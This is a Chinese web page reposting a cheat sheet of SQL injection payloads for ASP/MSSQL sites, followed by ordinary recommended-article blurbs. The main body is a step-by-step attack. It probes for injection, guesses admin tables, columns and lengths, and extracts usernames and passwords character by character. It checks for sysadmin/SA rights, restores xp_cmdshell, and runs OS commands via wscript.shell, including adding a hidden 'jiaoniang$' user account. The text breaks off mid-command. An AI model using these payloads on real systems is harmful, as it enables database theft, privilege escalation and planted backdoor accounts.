当前位置: 开发笔记 > 后端 > 正文

常用SQL注射语句解析_MySQL

作者：低调pasta_730 | 来源：互联网 | 2018-04-16 11:45

常用SQL注射语句解析

bitsCN.com

　SQL注射语句
　　1.判断有无注入点

　　&＃39; ; and 1=1 and 1=2

　　2.猜表一般的表的名称无非是admin adminuser user pass password 等..

　　and 0<>(select count(*) from *)

　　and 0<>(select count(*) from admin) ---判断是否存在admin这张表

　　3.猜帐号数目如果遇到0<返回正确页面 1<返回错误页面说明帐号数目就是1个

　　and 0<(select count(*) from admin)

　　and 1<(select count(*) from admin)

　　4.猜解字段名称在len( ) 括号里面加上我们想到的字段名称。

　　and 1=(select count(*) from admin where len(*)>0)--

　　and 1=(select count(*) from admin where len(用户字段名称name)>0)

　　and 1=(select count(*) from admin where len(密码字段名称password)>0)

　　5.猜解各个字段的长度猜解长度就是把>0变换直到返回正确页面为止

　　and 1=(select count(*) from admin where len(*)>0)

　　and 1=(select count(*) from admin where len(name)>6) 错误

　　and 1=(select count(*) from admin where len(name)>5) 正确长度是6

　　and 1=(select count(*) from admin where len(name)=6) 正确

　　and 1=(select count(*) from admin where len(password)>11) 正确

　　and 1=(select count(*) from admin where len(password)>12) 错误长度是12

　　and 1=(select count(*) from admin where len(password)=12) 正确

　　6.猜解字符

　　and 1=(select count(*) from admin where left(name,1)=&＃39;a&＃39;) ---猜解用户帐号的第一位

　　and 1=(select count(*) from admin where left(name,2)=&＃39;ab&＃39;)---猜解用户帐号的第二位

　　就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了

　　and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --

　　这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.

　　看服务器打的补丁=出错了打了SP4补丁

　　and 1=(select @@VERSION)--

　　看数据库连接账号的权限，返回正常，证明是服务器角色sysadmin权限。

　　and 1=(Select IS_SRVROLEMEMBER(&＃39;sysadmin&＃39;))--

　　判断连接数据库帐号。（采用SA账号连接返回正常=证明了连接账号是SA）

　　and &＃39;sa&＃39;=(Select System_user)--

　　and user_name()=&＃39;dbo&＃39;--

　　and 0<>(select user_name()--

　　看xp_cmdshell是否删除

　　and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = &＃39;X&＃39; AND

　　name = &＃39;xp_cmdshell&＃39;)--

　　xp_cmdshell被删除，恢复,支持绝对路径的恢复

　　;EXEC master.dbo.sp_addextendedproc &＃39;xp_cmdshell&＃39;,&＃39;xplog70.dll&＃39;--

　　;EXEC master.dbo.sp_addextendedproc

　　&＃39;xp_cmdshell&＃39;,&＃39;c:/inetpub/wwwroot/xplog70.dll&＃39;--

　　反向PING自己实验

　　;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec

　　sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--

　　加帐号

　　;DECLARE @shell INT EXEC SP_OACreate &＃39;wscript.shell&＃39;,@shell OUTPUT EXEC

　　SP_OAMETHOD @shell,&＃39;run&＃39;,null, &＃39;C:/WINNT/system32/cmd.exe /c net user

　　jiaoniang$ 1866574 /add&＃39;--

　　创建一个虚拟目录E盘：

　　;declare @o int exec sp_oacreate &＃39;wscript.shell&＃39;, @o out exec sp_oamethod

　　@o, &＃39;run&＃39;, NULL,&＃39; cscript.exe c：/inetpub/wwwroot/mkwebdir.vbs -

bitsCN.com

推荐阅读

注入
揭秘阿里云WAF背后神秘的AI智能防御体系

背景应用安全领域，各类攻击长久以来都危害着互联网上的应用，在web应用安全风险中，各类注入、跨站等攻击仍然占据着较前的位置。WAF(Web应用防火墙)正是为防御和阻断这类攻击而存在 ... [详细]

蜡笔小新 2023-12-11 01:30:52
注入
PHP组合工具以及开发所需的工具

本文介绍了PHP开发中常用的组合工具和开发所需的工具。对于数据分析软件，包括Excel、hihidata、SPSS、SAS、MARLAB、Eview以及各种BI与报表工具等。同时还介绍了PHP开发所需的PHP MySQL Apache集成环境，包括推荐的AppServ等版本。 ... [详细]

蜡笔小新 2023-12-09 17:36:44
注入
SQL日志收缩及截断方法详解

本文详细介绍了SQL日志收缩的方法，包括截断日志和删除不需要的旧日志记录。通过备份日志和使用DBCC SHRINKFILE命令可以实现日志的收缩。同时，还介绍了截断日志的原理和注意事项，包括不能截断事务日志的活动部分和MinLSN的确定方法。通过本文的方法，可以有效减小逻辑日志的大小，提高数据库的性能。 ... [详细]

蜡笔小新 2023-12-14 18:23:25
session
如何限制php数据库链接数和连接超时时间？

本文介绍了如何使用php限制数据库插入的条数并显示每次插入数据库之间的数据数目，以及避免重复提交的方法。同时还介绍了如何限制某一个数据库用户的并发连接数，以及设置数据库的连接数和连接超时时间的方法。最后提供了一些关于浏览器在线用户数和数据库连接数量比例的参考值。 ... [详细]

蜡笔小新 2023-12-14 14:06:10
注入
postman测试登录后的接口_使用postman进行接口测试的方法(测试用户管理模块)

本文介绍了使用postman进行接口测试的方法，以测试用户管理模块为例。首先需要下载并安装postman，然后创建基本的请求并填写用户名密码进行登录测试。接下来可以进行用户查询和新增的测试。在新增时，可以进行异常测试，包括用户名超长和输入特殊字符的情况。通过测试发现后台没有对参数长度和特殊字符进行检查和过滤。 ... [详细]

蜡笔小新 2023-12-14 10:29:45
注入
VB.NET在线急等问题解决方法，如何统计数据库字段下的数据并显示在文本框里？

本文介绍了一个在线急等问题解决方法，即如何统计数据库中某个字段下的所有数据，并将结果显示在文本框里。作者提到了自己是一个菜鸟，希望能够得到帮助。作者使用的是ACCESS数据库，并且给出了一个例子，希望得到的结果是560。作者还提到自己已经尝试了使用"select sum(字段2) from 表名"的语句，得到的结果是650，但不知道如何得到560。希望能够得到解决方案。 ... [详细]

蜡笔小新 2023-12-13 15:15:30
注入
如何在服务器主机上实现文件共享的方法和工具

本文介绍了在服务器主机上实现文件共享的方法和工具，包括Linux主机和Windows主机的文件传输方式，Web运维和FTP/SFTP客户端运维两种方式，以及使用WinSCP工具将文件上传至Linux云服务器的操作方法。此外，还介绍了在迁移过程中需要安装迁移Agent并输入目的端服务器所在华为云的AK/SK，以及主机迁移服务会收集的源端服务器信息。 ... [详细]

蜡笔小新 2023-12-13 13:23:48
注入
利用Visual Basic开发SAP接口程序初探的方法与原理

本文介绍了利用Visual Basic开发SAP接口程序的方法与原理，以及SAP R/3系统的特点和二次开发平台ABAP的使用。通过程序接口自动读取SAP R/3的数据表或视图，在外部进行处理和利用水晶报表等工具生成符合中国人习惯的报表样式。具体介绍了RFC调用的原理和模型，并强调本文主要不讨论SAP R/3函数的开发，而是针对使用SAP的公司的非ABAP开发人员提供了初步的接口程序开发指导。 ... [详细]

蜡笔小新 2023-12-13 10:56:31
注入
服务器上的操作系统有哪些，如何选择适合的操作系统？

本文介绍了服务器上常见的操作系统，包括系统盘镜像、数据盘镜像和整机镜像的数量。同时，还介绍了共享镜像的限制和使用方法。此外，还提供了关于华为云服务的帮助中心，其中包括产品简介、价格说明、购买指南、用户指南、API参考、最佳实践、常见问题和视频帮助等技术文档。对于裸金属服务器的远程登录，本文介绍了使用密钥对登录的方法，并提供了部分操作系统配置示例。最后，还提到了SUSE云耀云服务器的特点和快速搭建方法。 ... [详细]

蜡笔小新 2023-12-12 13:33:19
注入
延迟注入工具（python）的SQL脚本

本文介绍了一个延迟注入工具（python）的SQL脚本，包括使用urllib2、time、socket、threading、requests等模块实现延迟注入的方法。该工具可以通过构造特定的URL来进行注入测试，并通过延迟时间来判断注入是否成功。 ... [详细]

蜡笔小新 2023-12-12 10:36:42
注入
介绍一个免费的具备数据显示/录入/更新/删除功能的asp.net控件

本文介绍了一个免费的asp.net控件，该控件具备数据显示、录入、更新、删除等功能。它比datagrid更易用、更实用，同时具备多种功能，例如属性设置、数据排序、字段类型格式化显示、密码字段支持、图像字段上传和生成缩略图等。此外，它还提供了数据验证、日期选择器、数字选择器等功能，以及防止注入攻击、非本页提交和自动分页技术等安全性和性能优化功能。最后，该控件还支持字段值合计和数据导出功能。总之，该控件功能强大且免费，适用于asp.net开发。 ... [详细]

蜡笔小新 2023-12-11 09:41:26
注入
Mybatis中#与$的区别及其作用详解

本文详细介绍了Mybatis中#与$的区别及其作用。#{}可以防止sql注入，拼装sql时会自动添加单引号，适用于单个简单类型的形参。${}则将拿到的值直接拼装进sql，可能会产生sql注入问题，需要手动添加单引号，适用于动态传入表名或字段名。#{}可以实现preparedStatement向占位符中设置值，自动进行类型转换，有效防止sql注入，提高系统安全性。 ... [详细]

蜡笔小新 2023-12-10 14:30:39
缓存
Spring框架《一》简介

Spring框架《一》1.Spring概述1.1简介1.2Spring模板二、IOC容器和Bean1.IOC和DI简介2.三种通过类型获取bean3.给bean的属性赋值3.1依赖 ... [详细]

蜡笔小新 2023-12-09 20:10:11
缓存
禅道测试管理工具的介绍及搭建方法

本文介绍了禅道作为一款国产开源免费的测试管理工具的特点和功能，并提供了禅道的搭建和调试方法。禅道是一款B/S结构的项目管理工具，可以实现组织管理、后台管理、产品管理、项目管理和测试管理等功能。同时，本文还介绍了其他软件测试相关工具，如功能自动化工具和性能自动化工具，以及白盒测试工具的使用。通过本文的阅读，读者可以了解禅道的基本使用方法和优势，从而更好地进行测试管理工作。 ... [详细]

蜡笔小新 2023-12-09 19:03:20
缓存
webpack二刷之二、loader资源模块加载器

loader资源模块加载器webpack资源模块加载webpack内部(内部loader)默认只会处理javascript文件，也就是说它会把打包过程中所有遇到的 ... [详细]

蜡笔小新 2023-10-17 21:26:42

低调pasta_730

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章